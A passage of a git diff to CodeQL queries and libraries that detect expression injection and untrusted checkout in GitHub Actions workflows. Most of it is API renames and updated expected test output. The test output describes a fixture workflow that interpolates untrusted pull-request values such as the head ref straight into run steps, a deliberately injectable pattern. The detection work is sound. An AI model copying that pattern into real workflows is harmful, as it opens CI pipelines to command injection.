LeafTree instanceof Uses { } private class InputTree extends LeafTree instanceof Input { } -// private class OutputExprTree extends LeafTree instanceof OutputExpr { } -// -// private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } -// -// private class EnvExprTree extends LeafTree instanceof EnvExpr { } -private class ExprAccessTree extends LeafTree instanceof ContextExpression { } - -private class AstNodeLeaf extends LeafTree instanceof Expression { } +private class StringLiteralLeaf extends LeafTree instanceof StringLiteral { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 479078fe18b2..c427f8b828a0 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -52,7 +52,7 @@ predicate externallyDefinedSource( ) and ( if fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env.", "")) + then source.asExpr() = uses.getEnvVar(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") then source.asExpr() = uses @@ -76,10 +76,10 @@ predicate externallyDefinedStoreStep( ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + then pred.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + then pred.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) else none() ) and succ.asExpr() = uses @@ -90,10 +90,10 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + then sink.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + then sink.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) else none() ) and sinkModel(action, version, input, kind) and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 64df342ae9b7..0dea91af2b92 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -36,9 +36,9 @@ class AdditionalTaintStep extends Unit { predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getEnvExpr(varName) = pred.asExpr() and + r.getEnvVar(varName) = pred.asExpr() and exists(string script, string line | - script = r.getScript() and + script = r.getScript().getValue() and line = script.splitAt("\n") and ( output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index d99db775d613..57ef47434871 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -162,7 +162,7 @@ class ParameterPosition extends string { * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } + ArgumentPosition() { exists(any(Uses e).getArgument(this)) } } /** @@ -301,7 +301,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(Outputs out, string fieldName | - node1.asExpr() = out.getOutputExpr(fieldName) and + node1.asExpr() = out.getOutput(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) ) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index dbae273151b0..3a21005e29be 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -78,12 +78,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgument(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgument(pos) = this.getCfgNode().getAstNode()) } } diff --git a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml deleted file mode 100644 index df2fe6e37348..000000000000 --- a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml +++ /dev/null @@ -1,39 +0,0 @@ ---- -sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib -baselineLinesOfCode: 0 -unicodeNewlines: false -columnKind: utf16 -primaryLanguage: yaml -inProgress: - primaryLanguage: yaml - installedExtractors: - go: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/go - python: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/python - java: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/java - html: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/html - xml: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/xml - properties: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/properties - cpp: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/cpp - swift: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/swift - csv: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csv - yaml: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/yaml - csharp: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csharp - javascript: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/javascript - ruby: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/ruby -creationMetadata: - cliVersion: 2.16.0 - creationTime: 2024-02-02T10:02:02.082819Z -finalised: false diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 4b78f275382a..ac829c2395e8 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 0edeb0a7ec80..02e17b76ac5c 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 59a05f64b6c9..7ca865609983 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 28ff074fd966..fd4350efae8a 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 6e88f36feced..7b0f3159357c 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 4f710a16e8f6..699c5b2b5dcb 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 63f1a7a9d3a3..1f7797b8a0a7 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index b13bf88abe64..0bf4e858db20 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 34bcbd7b0605..58561ca6dba4 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -21,7 +21,7 @@ private predicate isTrustedOrg(string repo) { exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } -from StepUses uses, string repo, string version, Workflow workflow, string name +from UsesStep uses, string repo, string version, Workflow workflow, string name where uses.getCallee() = repo and uses.getEnclosingWorkflow() = workflow and diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index ed96d5f07c1b..2e3dc7049bd6 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -32,14 +32,14 @@ class LabelCheck extends If { } } -from Workflow w, Job job, StepUses checkoutStep +from Workflow w, Job job, UsesStep checkoutStep where w.hasTriggerEvent("pull_request_target") and w.getAJob() = job and job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep - .getArgumentExpr("ref") + .getArgument("ref") .(Expression) .getExpression() .matches([ diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index ffbbed2bac18..4d290a906044 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -71,156 +71,179 @@ yamlNodes | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | jobNodes -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | stepNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | allUsesNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | stepUsesNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | jobUsesNodes +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesSteps -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | runSteps -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:39:10 | id | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | parentNodes | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:32:5:40:53 